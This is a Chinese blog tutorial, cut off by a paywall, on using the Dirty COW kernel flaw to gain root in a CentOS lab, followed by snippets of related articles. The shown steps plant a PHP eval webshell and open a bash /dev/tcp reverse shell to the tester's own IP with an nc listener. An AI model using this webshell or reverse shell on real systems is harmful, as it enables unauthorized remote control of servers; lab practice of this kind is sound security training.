Linux利用脏牛漏洞提权

最新推荐文章于 2024-06-05 11:28:52 发布
最新推荐文章于 2024-06-05 11:28:52 发布
阅读量5.7k 收藏 21
点赞数 5
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104783544
版权

实验环境:Centos6.5、ssh

实验步骤:

一、搭建实验环境

1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd php

2.启动http,进入etc/init.d目录,输入:./httpd start

3.关掉selinux,输入:setenforce 0

4.在var/www/html目录下写一个一句话木马文件,内容为:<?php @eval($_REQUEST[666]);?>

二、进行提权

1.利用中国菜刀连接Centos,打开虚拟终端

2.获取交互式shell,输入:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,并在cmd中利用nc开启监听的端口号,交互成功

3.利用uname -a命令查看系统的内核系统

最低0.47元/天 解锁文章
没有如果ru果
关注
  • 5
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
脏牛提权(靶机复现)
tubug的博客
03-26 2160
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
Linux脏牛(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 2985
对CVE-2016-5159提权的保姆级的教程
Linux权限提升—内核、SUID、脏牛提权
剁椒鱼头没剁椒的博客
04-02 3073
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞
linux提权脏牛CVE-2016-5195-
最新发布
aaaaaadvszv的博客
06-05 146
lutil:链接 libutil 库。这对于使用多线程的程序是必要的。1.利用nmap查看你217网段下的开放端口,发现217.147开放80端口。-pedantic:更严格地遵循标准,发现一些非标准的用法。-std=c++11:使用 C++11 标准进行编译。g++:GNU 编译器集合中的 C++ 编译器。-odcow:指定输出文件的名称为 dcow。-O2:启用优化级别 2,进行中级优化。6.赋予执行权限,执行脚本进行漏洞检测。-Wall:启用所有常见的警告信息。dcow.cpp:源代码文件的名称。
vulnhub--lampiao(脏牛提权
鲨鱼辣椒的博客
08-03 4466
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Linux提权脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
linux利用脏牛提权
a1262443306的博客
04-18 1214
Linux利用脏牛漏洞提权: 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow) ​ 本主机:kali ip: 192.168.223.129 ​ 目标机:ubuntu ip:192.168.223.128 ​ 提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接 打开虚拟终端: 2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)
dirtycow脏牛linux提权exp
03-25
这个漏洞利用Linux内核中的一个内存管理错误,允许本地非特权用户获取root权限,进行权限提升,因此在网络安全领域中被称为“脏牛提权漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
xss、脏牛提权.zip
06-18
脏牛漏洞(Dirty COW)是Linux系统中的一个严重权限提升漏洞,其全称为"Copy-on-Write",即写时复制。这个漏洞允许一个普通用户获得root权限,从而能够执行任意代码,危害极大。脏牛漏洞源于Linux内核的内存管理机制...
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
**案例4:Linux提权脏牛内核漏洞演示** 脏牛(Dirty COW)是Linux内核中的一个严重漏洞,允许攻击者以非特权用户身份修改任意读取-only内存映射文件。利用漏洞,攻击者可以获取root权限。这个过程包括使用工具如...
脏牛提权复现以及如何得到一个完全交互的shell1
08-03
当成功访问这个后门并获得了一个低权限的Web shell时,可以利用脏牛漏洞的EXP(exploit)进行提权脏牛EXP可以从GitHub上的FireFart/dirtycow项目获取。下载后,通过`gcc -pthread dirty.c -o dirty –lcrypt`...
红队测试之Linux提权小结1
08-03
Linux内核提权漏洞为例,如著名的“脏牛漏洞,它暴露了Linux内核的内存管理问题,允许攻击者从低权限用户提升到root权限。检测和利用这些漏洞的工具,如`linux-exploit-suggester`,可以帮助安全研究人员或攻击...
脏牛提权及交互shell
weixin_43047908的博客
07-03 2549
目录什么是脏牛漏洞?影响范围及危害漏洞复现环境搭建脏牛提权完全交互shell权限维持 什么是脏牛漏洞脏牛漏洞(CVE-2016–5195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
Linux SUID提权&脏牛提权
m0_65096687的博客
05-24 949
设置了SUID后,文件启动的时候就会以root的权限去运行。就是一个普通用户运行的时候,因为有SUID,所以用root权限去运行它。SUID Files 还有一个 Possible interserting SUID files。全部的SUID文件和一个可能可以利用的SUID文件。连接上来后把漏洞检测的脚本上传至tmp目录运行。这是利用find手动查找有SUID文件的命令。这里不知道啥原因,反弹的shell还是yx。然后我们就要观察文件中是否存在以下文件。我们就利用find进行SUID提权
脏牛提权靶机
m0_73482536的博客
05-10 225
练习的靶机
linux “大脏牛漏洞分析(CVE-2017-1000405)
whatday的专栏
10-16 5140
一、背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛漏洞...
Linux脏牛漏洞提权
sGanYu
07-19 1392
通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描。退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址。首先我们使用nmap的sP参数通过ping探测已存活的主机。进入目标主机的/tmp目录,查看上传的1.sh是否存在。启动msf,通过msf搜索所有关于Drupal的漏洞。启动靶机后,默认是不给用户名、密码和IP地址的。上传漏洞收集脚本到目标主机赋予执行权限并执行。开启py终端,运行./dcow,获取密码。......
Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现
牛奶栗的小博客
09-27 4271
​vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
linux远程脏牛提权
06-11
"脏牛"漏洞Linux内核中的一个本地提权漏洞,攻击者可以利用漏洞在受害者系统上获得root权限。如果您想要远程利用漏洞进行提权,需要首先在目标系统上获取访问权限。 一种方法是使用SSH连接到目标系统,然后执行利用脏牛漏洞的攻击代码。攻击代码可以是已经编写好的工具,也可以是自己编写的脚本。 请注意,利用脏牛漏洞进行攻击是非法的,可能会导致严重后果。建议您遵守法律法规并避免进行非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值